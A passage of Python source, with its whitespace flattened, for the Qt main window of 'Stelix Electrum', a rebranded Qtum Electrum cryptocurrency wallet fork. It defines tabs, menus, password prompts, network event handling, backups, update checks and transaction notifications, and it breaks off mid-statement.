SOFTWARE. import sys import binascii import time import threading import os import traceback import json import weakref import csv from decimal import Decimal import base64 from functools import partial import queue import asyncio from typing import Optional, TYPE_CHECKING, Sequence, List, Union import eth_abi from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, QPoint from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget, QMenuBar, QFileDialog, QCheckBox, QLabel, QVBoxLayout, QGridLayout, QLineEdit, QHBoxLayout, QPushButton, QScrollArea, QTextEdit, QShortcut, QMainWindow, QCompleter, QInputDialog, QWidget, QSizePolicy, QStatusBar, QToolTip, QSplitter, QDialog, QMenu, QAction, QStackedWidget, QToolButton) import electrum from electrum.bitcoin import COIN, is_address, b58_address_to_hash160, Token, opcodes, \ TYPE_SCRIPT, is_hash160, hash_160, eth_abi_encode, Delegation, DELEGATE_ABI, DELEGATION_CONTRACT from electrum import (keystore, ecc, constants, util, bitcoin, commands, paymentrequest, lnutil) from electrum.plugin import run_hook, BasePlugin from electrum.i18n import _ from electrum.util import (format_time, UserCancelled, profiler, bfh, InvalidPassword, UserFacingException, get_new_wallet_name, send_exception_to_crash_reporter, InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds, NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs, AddTransactionException) from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice from electrum.transaction import (Transaction, PartialTxInput, PartialTransaction, PartialTxOutput) from electrum.transaction import contract_script, decode_opcreate_script, decode_opsender_script from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet, sweep_preparations, InternalAddressCorruption, CannotDoubleSpendTx) from electrum.version import ELECTRUM_VERSION from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError from electrum.exchange_rate import FxThread from electrum.simple_config import SimpleConfig from electrum.logging import Logger from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError from electrum.lnaddr import lndecode, LnDecodeException from electrum.plugins.trezor.trezor import TrezorKeyStore from .exception_window import Exception_Hook from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit from .qrcodewidget import QRCodeWidget, QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .fee_slider import FeeSlider, FeeComboBox from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog, WindowModalDialog, ChoicesLayout, HelpLabel, Buttons, OkButton, InfoButton, WWLabel, TaskThread, CancelButton, CloseButton, HelpButton, MessageBoxMixin, EnterButton, import_meta_gui, export_meta_gui, filename_field, address_field, char_width_in_lineedit, webopen, TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT, getOpenFileName, getSaveFileName) from .util import ButtonsTextEdit, ButtonsLineEdit from .installwizard import WIF_HELP_TEXT from .history_list import HistoryList, HistoryModel from .update_checker import UpdateCheck, UpdateCheckThread from .channels_list import ChannelsList from .confirm_tx_dialog import ConfirmTxDialog from .transaction_dialog import PreviewTxDialog from .token_dialog import TokenAddDialog, TokenInfoDialog, TokenSendDialog from .smart_contract_dialog import ContractCreateDialog, ContractEditDialog, ContractFuncDialog from .delegation_dialog import DelegationDialog from electrum.coinchooser import SenderNoUTXOException if TYPE_CHECKING: from . import ElectrumGui LN_NUM_PAYMENT_ATTEMPTS = 10 class StatusBarButton(QToolButton): def __init__(self, icon, tooltip, func): QToolButton.__init__(self) self.setText('') self.setIcon(icon) self.setToolTip(tooltip) self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon) self.setAutoRaise(True) self.setMaximumWidth(25) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) self.setCursor(QCursor(Qt.PointingHandCursor)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]: self.func() def protected(func): '''Password request wrapper. The password is passed to the function as the 'password' named argument. "None" indicates either an unencrypted wallet, or the user cancelled the password request. An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_keystore_encryption(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() network_signal = pyqtSignal(str, object) #ln_payment_attempt_signal = pyqtSignal(str) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() show_error_signal = pyqtSignal(str) payment_request: Optional[paymentrequest.PaymentRequest] def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet): QMainWindow.__init__(self) self.gui_object = gui_object self.config = config = gui_object.config # type: SimpleConfig self.gui_thread = gui_object.gui_thread assert wallet, "no wallet" self.wallet = wallet if wallet.has_lightning(): self.wallet.config.set_key('show_channels_tab', True) self.setup_exception_hook() self.network = gui_object.daemon.network # type: Network self.fx = gui_object.daemon.fx # type: FxThread self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self._cleaned_up = False self.payment_request = None # type: Optional[paymentrequest.PaymentRequest] self.payto_URI = None self.checking_accounts = False self.qr_window = None self.pluginsdialog = None self.showing_cert_mismatch_error = False self.tl_windows = [] self.pending_invoice = None Logger.__init__(self) self.tx_notification_queue = queue.Queue() self.tx_notification_last_time = 0 self.create_status_bar() self.need_update = threading.Event() self.completions = QStringListModel() coincontrol_sb = self.create_coincontrol_statusbar() self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() self.channels_tab = self.create_channels_tab() self.tokens_tab = self.create_tokens_tab() self.smart_contract_tab = self.create_smart_contract_tab() self.delegations_tab = self.create_delegations_tab() tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History')) tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive')) tabs.addTab(self.tokens_tab, read_QIcon("tab_contacts.png"), _('Tokens')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses") if self.wallet.has_lightning(): add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels") add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console") add_optional_tab(tabs, self.smart_contract_tab, read_QIcon("tab_console.png"), _('Smart Contract'), 'contract') add_optional_tab(tabs, self.delegations_tab, read_QIcon("tab_console.png"), _('Delegations'), 'delegations') tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) central_widget = QWidget() vbox = QVBoxLayout(central_widget) vbox.setContentsMargins(0, 0, 0, 0) vbox.addWidget(tabs) vbox.addWidget(coincontrol_sb) self.setCentralWidget(central_widget) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(read_QIcon("electrum.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("F5"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) self.show_error_signal.connect(self.show_error) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'new_transaction', 'status', 'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes', 'on_history', 'channel', 'channels_updated', 'payment_failed', 'payment_succeeded', 'on_token', 'on_delegation', 'invoice_status', 'request_status', 'ln_gossip_sync_progress', 'cert_mismatch', 'gossip_db_loaded'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... util.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) # update fee slider in case we missed the callback #self.fee_slider.update() self.load_wallet(wallet) gui_object.timer.timeout.connect(self.timer_actions) self.fetch_alias() # If the option hasn't been set yet if config.get('check_updates') is None: choice = self.question(title="Stelix Electrum - " + _("Enable update check"), msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " + _("Would you like to be notified when there is a newer version of Electrum available?")) config.set_key('check_updates', bool(choice), save=True) self._update_check_thread = None if config.get('check_updates', False): # The references to both the thread and the window need to be stored somewhere # to prevent GC from getting in our way. def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to Stelix Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread() self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def setup_exception_hook(self): Exception_Hook.maybe_setup(config=self.config, wallet=self.wallet) def run_coroutine_from_thread(self, coro, on_result=None): def task(): try: f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) r = f.result() if on_result: on_result(r) except Exception as e: self.logger.exception("exception in coro scheduled via window.wallet") self.show_error_signal.emit(str(e)) self.wallet.thread.add(task) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_fx_token(self): self.token_hist_model.refresh('fx_token') self.token_hist_list.update() self.token_balance_list.update() def on_fx_delegation(self): self.delegation_list.update() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: # TODO would be nice if we just sent these to the crash reporter... # anything we don't want to send there, we should explicitly catch # send_exception_to_crash_reporter(e) try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(repr(e)) def on_network(self, event, *args): # Handle in GUI thread self.network_signal.emit(event, args) def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread # note: all windows get events from all wallets! if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event == 'on_quotes': self.on_fx_quotes() elif event == 'on_history': self.on_fx_history() elif event == 'on_token': self.on_fx_token() elif event == 'on_delegation': self.on_fx_delegation() elif event == 'gossip_db_loaded': self.channels_list.gossip_db_loaded.emit(*args) elif event == 'channels_updated': wallet = args[0] if wallet == self.wallet: self.channels_list.update_rows.emit(*args) elif event == 'channel': wallet = args[0] if wallet == self.wallet: self.channels_list.update_single_row.emit(*args) self.update_status() elif event == 'request_status': self.on_request_status(*args) elif event == 'invoice_status': self.on_invoice_status(*args) elif event == 'payment_succeeded': wallet = args[0] if wallet == self.wallet: self.on_payment_succeeded(*args) elif event == 'payment_failed': wallet = args[0] if wallet == self.wallet: self.on_payment_failed(*args) elif event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': pass elif event == 'fee_histogram': self.history_model.on_fee_histogram() elif event == 'ln_gossip_sync_progress': self.update_lightning_icon() elif event == 'cert_mismatch': self.show_cert_mismatch_error() else: self.logger.info(f"unexpected network event: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet: Abstract_Wallet): wallet.thread = TaskThread(self, self.on_error) self.update_recently_visited(wallet.storage.path) if wallet.has_lightning(): util.trigger_callback('channels_updated', wallet) self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.channels_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.db.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Stelix Electrum Testnet" if constants.net.TESTNET else "Stelix Electrum" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.db.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend SLXs with it."), _("Make sure you own the seed phrase or the private keys, before you request SLXs to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main Stelix network. It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def select_backup_dir(self, b): name = self.config.get('backup_dir', '') dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name) if dirname: self.config.set_key('backup_dir', dirname) self.backup_dir_e.setText(dirname) def backup_wallet(self): d = WindowModalDialog(self, _("File Backup")) vbox = QVBoxLayout(d) grid = QGridLayout() backup_help = "" backup_dir = self.config.get('backup_dir') backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help) msg = _('Please select a backup directory') if self.wallet.has_lightning() and self.wallet.lnworker.channels: msg += '\n\n' + ' '.join([ _("Note that lightning channels will be converted to channel backups."), _("You cannot use channel backups to perform lightning payments."), _("Channel backups can only be used to request your channels to be closed.") ]) self.backup_dir_e = QPushButton(backup_dir) self.backup_dir_e.clicked.connect(self.select_backup_dir) grid.addWidget(backup_dir_label, 1, 0) grid.addWidget(self.backup_dir_e, 1, 1) vbox.addLayout(grid) vbox.addWidget(WWLabel(msg)) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return try: new_path = self.wallet.save_backup() except BaseException as reason: self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) return if new_path: msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path) self.show_message(msg, title=_("Wallet backup created")) else: self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.wallet.storage.path)) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_wallet_info) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.export_invoices()) requests_menu = wallet_menu.addMenu(_("Requests")) requests_menu.addAction(_("Import"), lambda: self.import_requests()) requests_menu.addAction(_("Export"), lambda: self.export_requests()) try: addr_type, __ = b58_address_to_hash160(self.addresses[0]) except: addr_type = constants.net.SEGWIT_HRP if not isinstance(self.wallet.keystore, TrezorKeyStore) and addr_type == constants.net.ADDRTYPE_P2PKH and not self.wallet.is_watching_only(): token_menu = wallet_menu.addMenu(_("&Token")) token_menu.addAction(_("Add Token"), lambda: self.token_add_dialog()) smart_cotract_menu = wallet_menu.addMenu(_("&Smart Contract")) smart_cotract_menu.addAction(_("Add Contract"), lambda: self.contract_add_dialog()) smart_cotract_menu.addAction(_("Create Contract"), lambda: self.contract_create_dialog()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) if self.wallet.has_lightning(): add_toggle_action(view_menu, self.channels_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) add_toggle_action(view_menu, self.smart_contract_tab) add_toggle_action(view_menu, self.delegations_tab) tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction if sys.platform == 'darwin': # "Settings"/"Preferences" are all reserved keywords in macOS. # preferences_action will get picked up based on name (and put into a standardized location, # and given a standard reserved hotkey) # Hence, this menu item will be at a "uniform location re macOS processes" preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences # Add another preferences item, to also have a "uniform location for Electrum between different OSes" tools_menu.addAction(_("Electrum preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network)) tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network)) tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower)) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign POD"), self.sign_pod) tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webopen("https://github.com/alayo05/stelix-electrum")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters().server.host self.pay_to_URI('stelix:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Qtum Electrum", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("This software is based on Electrum to support Qtum.") + " " + _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_update_check(self, version=None): self.gui_object._update_check = UpdateCheck(latest_version=version) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''', _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="Qtum Electrum - " + _("Reporting Bugs"), rich_text=True) def notify_transactions(self): if self.tx_notification_queue.qsize() == 0: return if not self.wallet.up_to_date: return # no notifications while syncing now = time.time() rate_limit = 20 # seconds if self.tx_notification_last_time + rate_limit > now: return self.tx_notification_last_time = now self.logger.info("Notifying GUI about new transactions") txns = [] while True: try: txns.append(self.tx_notification_queue.get_nowait()) except queue.Empty: break # Combine the transactions if there are at least three if len(txns) >= 3: total_amount = 0 for tx in txns: tx_wallet_delta = self.wallet.get_wallet_delta(tx) if not tx_wallet_delta.is_relevant: continue total_amount += tx_wallet_delta.delta self.notify(_("{} new transactions: Total amount received in the new transactions {}") .format(len(txns), self.format_amount_and_units(total_amount))) else: for tx in txns: tx_wallet_delta = self.wallet.get_wallet_delta(tx) if not tx_wallet_delta.is_relevant: continue self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta))) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("Qtum Electrum", message, read_QIcon("electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("Qtum Electrum", message, QSystemTrayIcon.Information, 20000) def timer_actions(self): self.request_list.refresh_status() # Note this runs in the GUI thread if self.need_update.is_set(): self.need_update.clear() self.update_wallet() elif not self.wallet.up_to_date: # this updates "synchronizing" progress self.update_status() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() self.notify_transactions() def format_amount(self, x, is_diff=False, whitespaces=False, num_zeros=None, decimal_point=None): # x is in sats return self.config.format_amount(x, is_diff, whitespaces, num_zeros, decimal_point) def format_amount_and_units(self, amount): # amount is in sats text = self.config.format_amount_and_units(amount) x = self.fx.format_amount_and_units(amount) if self.fx else None if text and x: text += ' (%s)'%x return text def format_fee_rate(self, fee_rate): return self.config.format_fee_rate(fee_rate) def get_decimal_point(self): return self.config.get_decimal_point() def base_unit(self): return self.config.get_base_unit() def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = 